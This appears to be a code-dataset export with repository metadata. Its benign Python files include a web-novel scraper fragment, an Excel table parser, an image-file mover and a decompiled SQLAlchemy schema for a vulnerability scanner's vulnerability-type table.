cdates.append(makeDate(dt, '%b %d, %Y'))
# <a href="https://www.novelall.com/chapter/Stellar-Transformation-Volume-18-Chapter-45-part2/616971/" title="Stellar Transformation Volume 18 Chapter 45 part2">
a = li.find('a')
ctitle = re.sub(r"^%s(.+)$" % re.escape(title), r"\1", a['title'], 0, re.UNICODE | re.IGNORECASE).strip()
self.add_chapter(ctitle, a['href'])
cdates.sort()
self.story.setMetadata('datePublished', cdates[0])
self.story.setMetadata('dateUpdated', cdates[-1])
def getChapterText(self, url):
data = self.get_request(url)
# remove unnecessary <br> created to add space between advert
data = re.sub(r"<br><script", "<script", data)
data = re.sub(r"script><br>", "script>", data)
if self.getConfig('fix_excess_space', False):
data = fix_excess_space(data)
soup = self.make_soup(data)
story = soup.find('div', {'class':'reading-box'})
if not story:
raise exceptions.FailedToDownload(
"Error downloading Chapter: %s! Missing required element!" % url)
# Some comments we will get is invalid. Remove them all.
for comment in story.find_all(text=lambda text:isinstance(text, Comment)):
comment.extract()
extract_tags = ('a', 'ins', 'script')
for tagname in extract_tags:
for tag in story.find_all(tagname):
tag.extract()
# Some tags have non-standard tag name.
for tag in story.findAll(recursive=True):
if tag.name not in HTML_TAGS:
tag.name = 'span'
return self.utf8FromSoup(url, story)
| 41.587361 | 173 | 0.567802 | true | true | |
1c334bdcd8d7ccf5ba0f8893842db5d53af4e545 | 1,996 | py | Python | LIEGE/database/table.py | seucs/entity-linker | 0156ad9b9d6439ea15518828513da9d9699b9acd | [
"Apache-2.0"
] | 4 | 2018-03-07T07:59:58.000Z | 2019-10-19T09:31:44.000Z | TabEL/database/table.py | acmom/entity-linker | 0156ad9b9d6439ea15518828513da9d9699b9acd | [
"Apache-2.0"
] | null | null | null | TabEL/database/table.py | acmom/entity-linker | 0156ad9b9d6439ea15518828513da9d9699b9acd | [
"Apache-2.0"
] | 2 | 2018-11-05T16:09:07.000Z | 2019-11-07T00:22:37.000Z | #coding=utf8
import xlrd
import xlwt
import json
import sys
reload(sys)
sys.setdefaultencoding('utf8')
class Table:
def __init__(self, table, row_num, col_num):
self.table = table
self.row_num = row_num
self.col_num = col_num
def __getitem__(self, i):
return self.table[i]
def getMentionContext(self, r, c):
res = []
for i in range(self.row_num):
if i == r:
continue
res.append(self.table[i][c])
for j in range(self.col_num):
if j == c:
continue
res.append(self.table[r][j])
return res
class tableManager:
def __init__(self, filename):
self.excel = xlrd.open_workbook('..//data//'+filename)
def getTable(self):
table = self.excel.sheet_by_name('Sheet1')
tables = []
nrows = table.nrows
ncols = table.ncols
# 按列存储
r = 0
down_flag = False
while True:
r += 1
# 获取当前表格的行数
next_r = r
while True:
if next_r == nrows:
down_flag = True
break
if table.cell(next_r,0).value != '':
next_r += 1
else:
break
# 获取当前表格的列数
next_c = 0
while True:
if next_c == ncols:
break
if table.cell(r,next_c).value != '':
next_c += 1
else:
break
t = []
for rr in range(r, next_r):
row = []
for cc in range(0,next_c):
row.append(table.cell(rr,cc).value)
t.append(row)
tables.append(Table(t, next_r - r, next_c))
if down_flag:
break
else:
r = next_r + 1
return tables
| 24.048193 | 62 | 0.43988 |
import xlrd
import xlwt
import json
import sys
reload(sys)
sys.setdefaultencoding('utf8')
class Table:
def __init__(self, table, row_num, col_num):
self.table = table
self.row_num = row_num
self.col_num = col_num
def __getitem__(self, i):
return self.table[i]
def getMentionContext(self, r, c):
res = []
for i in range(self.row_num):
if i == r:
continue
res.append(self.table[i][c])
for j in range(self.col_num):
if j == c:
continue
res.append(self.table[r][j])
return res
class tableManager:
def __init__(self, filename):
self.excel = xlrd.open_workbook('..//data//'+filename)
def getTable(self):
table = self.excel.sheet_by_name('Sheet1')
tables = []
nrows = table.nrows
ncols = table.ncols
r = 0
down_flag = False
while True:
r += 1
next_r = r
while True:
if next_r == nrows:
down_flag = True
break
if table.cell(next_r,0).value != '':
next_r += 1
else:
break
next_c = 0
while True:
if next_c == ncols:
break
if table.cell(r,next_c).value != '':
next_c += 1
else:
break
t = []
for rr in range(r, next_r):
row = []
for cc in range(0,next_c):
row.append(table.cell(rr,cc).value)
t.append(row)
tables.append(Table(t, next_r - r, next_c))
if down_flag:
break
else:
r = next_r + 1
return tables
| true | true |
1c334c43ec9647ed0e0ec846ea0ec8b0f1abcbfa | 1,332 | py | Python | movefiles.py | linhailan/JPG-PNG-to-MNIST-NN-Format | c2ff84cb8d2dc6cd49c4d462b4d8ea2ba4620719 | [
"Apache-2.0"
] | null | null | null | movefiles.py | linhailan/JPG-PNG-to-MNIST-NN-Format | c2ff84cb8d2dc6cd49c4d462b4d8ea2ba4620719 | [
"Apache-2.0"
] | null | null | null | movefiles.py | linhailan/JPG-PNG-to-MNIST-NN-Format | c2ff84cb8d2dc6cd49c4d462b4d8ea2ba4620719 | [
"Apache-2.0"
] | null | null | null | import os
from PIL import Image
from array import *
from random import shuffle
import shutil
def move_file(src_path, dst_path, file):
print("from : ",src_path)
print("to : ",dst_path)
try:
# cmd = 'chmod -R +x ' + src_path
# os.popen(cmd)
f_src = os.path.join(src_path, file)
if not os.path.exists(dst_path):
os.mkdir(dst_path)
f_dst = os.path.join(dst_path, file)
shutil.move(f_src, f_dst)
except Exception as e:
print("move file ERROR: ",e)
# Load from and save to
def loadfile(Names):
FileList = []
for dirname in os.listdir(Names[0][0]):
path = os.path.join(Names[0][0], dirname)
print(path)
i = 0
for filename in os.listdir(path):
if i >= 50:
break
if filename.endswith(".jpg"):
print(i,":",filename)
src_path = os.path.join(Names[0][0],dirname)
dst_path = os.path.join(Names[1][0],dirname)
move_file(src_path,dst_path,filename)
i += 1
Names = [['./training-images','train'], ['./test-images','test']]
for name in Names:
FileList = []
for dirname in os.listdir(name[0]):
path = os.path.join(name[0],dirname)
print(path,":",len(os.listdir(path)))
| 25.615385 | 65 | 0.553303 | import os
from PIL import Image
from array import *
from random import shuffle
import shutil
def move_file(src_path, dst_path, file):
print("from : ",src_path)
print("to : ",dst_path)
try:
f_src = os.path.join(src_path, file)
if not os.path.exists(dst_path):
os.mkdir(dst_path)
f_dst = os.path.join(dst_path, file)
shutil.move(f_src, f_dst)
except Exception as e:
print("move file ERROR: ",e)
def loadfile(Names):
FileList = []
for dirname in os.listdir(Names[0][0]):
path = os.path.join(Names[0][0], dirname)
print(path)
i = 0
for filename in os.listdir(path):
if i >= 50:
break
if filename.endswith(".jpg"):
print(i,":",filename)
src_path = os.path.join(Names[0][0],dirname)
dst_path = os.path.join(Names[1][0],dirname)
move_file(src_path,dst_path,filename)
i += 1
Names = [['./training-images','train'], ['./test-images','test']]
for name in Names:
FileList = []
for dirname in os.listdir(name[0]):
path = os.path.join(name[0],dirname)
print(path,":",len(os.listdir(path)))
| true | true |
1c334c7a02aa7230afa09f3c7b5da4b74c2bc05b | 1,748 | py | Python | acunetix/v11/db/tables/vuln_types.py | BenDerPan/DScaner | 1552b1877185c08b0db3c48da4e5c3c601c49ce0 | [
"MIT"
] | 20 | 2017-11-09T01:47:56.000Z | 2021-03-08T07:08:10.000Z | acunetix/v11/db/tables/vuln_types.py | BenDerPan/DScaner | 1552b1877185c08b0db3c48da4e5c3c601c49ce0 | [
"MIT"
] | null | null | null | acunetix/v11/db/tables/vuln_types.py | BenDerPan/DScaner | 1552b1877185c08b0db3c48da4e5c3c601c49ce0 | [
"MIT"
] | 6 | 2017-11-09T01:48:01.000Z | 2020-04-06T11:57:05.000Z | # uncompyle6 version 2.13.2
# Python bytecode 3.5 (3351)
# Decompiled from: Python 3.5.3 (default, Jan 19 2017, 14:11:04)
# [GCC 6.3.0 20170118]
# Embedded file name: db\tables\vuln_types.py
__author__ = 'sanyi'
from sqlalchemy import *
from sqlalchemy.orm import mapper
from sqlalchemy.dialects.postgresql import UUID as C_UUID
from sqlalchemy.dialects.postgresql import ARRAY as C_ARRAY
from .tables import metadata
sensor_details_template = '{{#file}}<p>Source file: <strong class="bb-dark">{{file}}</strong> line: <strong class="bb-dark">{{line}}</strong></p>{{/file}}\n{{#additional}}\n<p>Additional details:</p>\n<code><pre>{{additional}}</pre></code>\n{{/additional}}'
VulnTypesTable = Table('vuln_types', metadata, Column('vt_id', C_UUID, primary_key=True), Column('app_id', TEXT, index=True, unique=True), Column('name', TEXT, nullable=False, index=True), Column('severity', Integer, nullable=False, index=True), Column('details_template', TEXT), Column('impact', TEXT), Column('description', TEXT), Column('recommendation', TEXT), Column('long_description', TEXT), Column('tags', C_ARRAY(TEXT), index=True), Column('cvss2', TEXT, index=True), Column('cvss3', TEXT, index=True), Column('cvss_score', REAL, index=True), Column('refs', C_ARRAY(TEXT)))
class VulnTypeRow(object):
vt_id = None
name = None
severity = None
tags = None
cvss2 = None
cvss3 = None
cvss_score = None
impact = None
description = None
recommendation = None
long_description = None
refs = None
details_template = None
app_id = None
def __str__(self):
return 'R_vuln_type[%s]=%s' % (self.vt_id, self.name)
def __repr__(self):
return self.__str__()
mapper(VulnTypeRow, VulnTypesTable) | 46 | 582 | 0.699657 |
__author__ = 'sanyi'
from sqlalchemy import *
from sqlalchemy.orm import mapper
from sqlalchemy.dialects.postgresql import UUID as C_UUID
from sqlalchemy.dialects.postgresql import ARRAY as C_ARRAY
from .tables import metadata
sensor_details_template = '{{#file}}<p>Source file: <strong class="bb-dark">{{file}}</strong> line: <strong class="bb-dark">{{line}}</strong></p>{{/file}}\n{{#additional}}\n<p>Additional details:</p>\n<code><pre>{{additional}}</pre></code>\n{{/additional}}'
VulnTypesTable = Table('vuln_types', metadata, Column('vt_id', C_UUID, primary_key=True), Column('app_id', TEXT, index=True, unique=True), Column('name', TEXT, nullable=False, index=True), Column('severity', Integer, nullable=False, index=True), Column('details_template', TEXT), Column('impact', TEXT), Column('description', TEXT), Column('recommendation', TEXT), Column('long_description', TEXT), Column('tags', C_ARRAY(TEXT), index=True), Column('cvss2', TEXT, index=True), Column('cvss3', TEXT, index=True), Column('cvss_score', REAL, index=True), Column('refs', C_ARRAY(TEXT)))
class VulnTypeRow(object):
vt_id = None
name = None
severity = None
tags = None
cvss2 = None
cvss3 = None
cvss_score = None
impact = None
description = None
recommendation = None
long_description = None
refs = None
details_template = None
app_id = None
def __str__(self):
return 'R_vuln_type[%s]=%s' % (self.vt_id, self.name)
def __repr__(self):
return self.__str__()
mapper(VulnTypeRow, VulnTypesTable) | true | true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.